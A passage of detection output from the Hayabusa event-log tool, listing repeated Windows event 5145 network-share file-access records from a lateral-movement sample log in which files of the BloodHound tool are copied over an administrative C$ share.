10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 